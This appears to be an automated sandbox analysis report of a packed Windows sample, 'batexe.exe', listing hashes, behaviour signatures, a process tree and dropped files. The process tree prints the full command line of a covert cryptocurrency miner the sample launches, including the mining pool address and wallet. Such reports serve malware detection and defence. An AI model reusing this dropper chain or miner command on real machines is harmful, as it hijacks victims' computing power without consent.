Analysis

  • max time kernel
    295s
  • max time network
    301s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-ja
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20231215-ja, locale:ja-jp, os:windows10-2004-x64, system, windows
  • submitted
    19/02/2024, 19:07

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1744
    • C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1160
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5BFB.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1640
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:3252

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe

    Filesize

    587KB

    MD5

    fea1c01b23aa64a9ec039112ed7ed8bf

    SHA1

    2e4d9e66d1bf77e8cc98f8448a95583d937e1479

    SHA256

    cec04776370255aad7163575583cdcc2ad44bf493a013bf72779b000e4d12f4a

    SHA512

    4b2af6494bc407c92533ee11ec9fe15a03ff9deb7cf4bd8d73c522f9291ac45a4fc743d4fe370b6fcd032303384ff80f9789bc98117ef7567b64f926574bf0bb

  • C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe

    Filesize

    311KB

    MD5

    c25f078d854b6eecafea08422d400be9

    SHA1

    d1fd6dde1ce96d9d271d3ded78e08a05c079460b

    SHA256

    5eb351b2b0126a67614e4a649255ea3fcebb8b8f29966e4ec41b91b28f5e8fa8

    SHA512

    c32a82e23b57c2270078fd1e6819c723c1f270e61e3eae738178898d0d5c5023252b7638ee0753e311fbd955a7e5967a8087917f56e4b4d6728580e462ab35f0

  • C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe

    Filesize

    383KB

    MD5

    a0722090ec22ddd524394dc8a29b881f

    SHA1

    9dc74e600c470551f9502e0d2c8d1ab8cefb9d25

    SHA256

    79832d1aaefb4351b534f10e5731790f044bfd367e9a428b1e3b7bae437cc743

    SHA512

    6b0aafcd8e74c5b13adc2a37141730f18dcf67e148601d6b62e18030322834d86af8d618175069d5c24400bd4beaa73f04e9864df03ff70064bb3f7ff1193d89

  • C:\Users\Admin\AppData\Local\Temp\5BFB.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    342KB

    MD5

    ef8bd5632886c483d385a61fbd471188

    SHA1

    492d35371807a1c2d45a106a6cdc054c03b68d82

    SHA256

    20721371bfe84a0829c53f675839877dca6b871e794b3cf38db6a2a522921355

    SHA512

    35d55320417832a1f7c7d878068dc39c39859967a3d305c0557ae6e35c77298e629f66f64c33ba5f5d10dad6311dcc6225c427d31f3a6a72c2e07a2afe82c7aa

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    333KB

    MD5

    325eddc9f624b8f5b43f95c3fdf1e50c

    SHA1

    b1253f1ac79f179bcae6d6f2dd865005b5f263a9

    SHA256

    46abf0be4bd961acb71f309ea81a1ecf5529175da2dd04492db3f1f44dda90e8

    SHA512

    e8aca9915ef2b842b46a4fa7487ae564b454320002c52e60c1a069f7041ea032cb9a0eb833b64a43b6dafd463d94013f8d3acca4fb8d622e3a5ebdc62c6f734a

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    320KB

    MD5

    9abc2d6fe180a37b542f3bf99c5d8a02

    SHA1

    5e790ae05ec1b186913b623aced47d297624505e

    SHA256

    eb1c9a5381930635bc73148bf8e4110f8d63016c12c2e0fae83250f9c448a355

    SHA512

    14edf6aecd8d06274489862a2c9c3f44e88cf151de58fe80499747a5f702635496a29e290f3e6f09241861024c12a570b20e44367e19326824ed20edb64c98b6

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    455KB

    MD5

    70da085c27d57f71eb905742c625bac0

    SHA1

    c752c4959659f55f3f97368472af78cb32c3811b

    SHA256

    afed1d669d4bc37657f90f6c5cb95942de9817f0e14aa480fce13baa63605229

    SHA512

    6d0c5cf24488df40331e14ebba10f63f7d43d9399ee427d02cb3d400abaf8ee7c3538a34ce8b6769aaf90c013d6237f579901b20d7bb8c7d79618bff49653a14

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    29KB

    MD5

    16346bed1eda23c10aedf446308160fd

    SHA1

    8f3c2504ecea24d623de72be6a1f3f88ab81c39b

    SHA256

    4b3adf842053b2176220b6d8c772e10f2069cb8c332b26b0d80728d607007b83

    SHA512

    4d0764f8d27dcea55db6d5abffe679af5676c1e636f0bcc044a2898e8dbd4c2de5203b37b84a5825a7c43aa888d60921ec9000ca070f08b83759bd4424f1d07d

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    342KB

    MD5

    5e927cbf1c58ff2a9e6387b5449a594b

    SHA1

    41878ce55789632331c2665529a0a3349c8ed70d

    SHA256

    ee31afeba5011c397cfde20da4417b04ac4893164ca820d94f49e3016876579a

    SHA512

    fb6458232802bd33f8532813ed08065c73cd66ec27d7ca61f51d2f595a854d1120e35ae37d34ee64bf8d936ddbb3ca82d80dfff7fe4aa50a820790019b0e7562

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    32KB

    MD5

    b5ee2ecfeb4202d3e8b80c60fe8c98f4

    SHA1

    f4c7678c3241776d53736f224f09d2cd49ec0876

    SHA256

    c8095b7b9c67c5c3106a7469febc09bba50b3a384bfb98bf0fba0a4a22c36844

    SHA512

    17190c52d497237abec71f569306b8f9cc36104ef89f002ab366702892cfae8311a7f4ac5ecb410b173932d3c5f3ebd0b16158d26a0e90c9dc029b3e805db543

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    434KB

    MD5

    d9e4de1938ccdb97fb8c64bdc6732248

    SHA1

    50906c7ac7f0b4b55d5aa79aadc1c8e62f872094

    SHA256

    bd55e9678c616c987e26a3e026f76def805da213378697d8497ed7c6a94a619f

    SHA512

    18274322fe30feaac75cb73a620691b866a0ece502f81728f018e99c4d7f15e8b600834ad2519b575af132c597b58e14e3bd7e4a6c01d1df431cd0fe179b5491

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    149KB

    MD5

    31325ee097b2686dd3f7ed3c46dca632

    SHA1

    b0f57a72c2b5d73f2a3b64937f3c442d4c1892b0

    SHA256

    a8695fed44df7301297f77490b02ecb540f18663e0023f9bbe956e9ab1adada8

    SHA512

    0b6b4ebd9c5437aee23455b1aa41814b413a9f8fb6257ddb7984254aa0c2fe6b50bc8829eed15295bce4b0c7476732a8f2f660cb72587f639c29bc63b8cc64f7

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    368KB

    MD5

    ef47272543eba722b4d8e902431e4208

    SHA1

    df59be565b9051a17c7c21bf9e50dc5c1dc29078

    SHA256

    8f46f6941285af191a1fe2c89f15c65cdfe3986772245ffa37ed8dabe9c6c8c6

    SHA512

    4c00a1db992be74e6c50793a8cd9a6e7598190f761837553fa7e97403c15ffc232fa3332a93dab9642affaeda472e4ae17cae3ce463041f1a251a11829944e29

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    367KB

    MD5

    41217be4144b5551c1b2df7e883b01fa

    SHA1

    a8fa0c068233d97656d878d29303b39af2721fbd

    SHA256

    d16b777fa8214b8fa07e483ff5f1fdd808fa7779d0b3904642a36d8dcf4fb688

    SHA512

    e14e8f8e9d2be69ce414c1a9ae01e6257f0b61a7ff07a38c34f541c024b651df1f147cfeb5e14162f8f1a6002b2c0f56f9e868084223faa4e486237ba4c8204a

  • memory/1160-53-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/1160-9-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/1744-8-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB

  • memory/3252-45-0x0000000072210000-0x00000000722A8000-memory.dmp

    Filesize

    608KB

  • memory/3252-44-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/3252-43-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3252-47-0x0000000000E10000-0x00000000026C5000-memory.dmp

    Filesize

    24.7MB

  • memory/3252-48-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3252-46-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/3252-59-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3252-64-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3252-74-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3252-89-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3252-94-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3252-99-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB